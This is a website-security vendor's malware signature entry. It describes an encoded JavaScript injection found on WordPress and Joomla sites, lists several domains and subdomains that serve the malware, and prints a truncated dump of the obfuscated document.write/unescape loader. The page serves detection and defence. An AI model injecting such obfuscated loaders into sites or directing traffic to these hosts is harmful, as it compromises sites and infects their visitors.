SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs221

malware-entry-mwjs221

Description:This encoded javascript loads malware from:
.disonsnightclub.com/data/mootools.js
.gaindirectory.org/data/mootools.js
.ideacoreportal.com/data/mootools.js
.karenegren.com/data/mootools.js
*.emapis.org/data/mootools.js

And some sub domains within it: "aqua.","azure.","black.","blue.","brown.",
"chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.",
"indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.",
"pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."]

Affecting: Any web site (common on WordPress and Joomla).

Malware dump:


document . write (unescape ( ' %3C %73 %63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74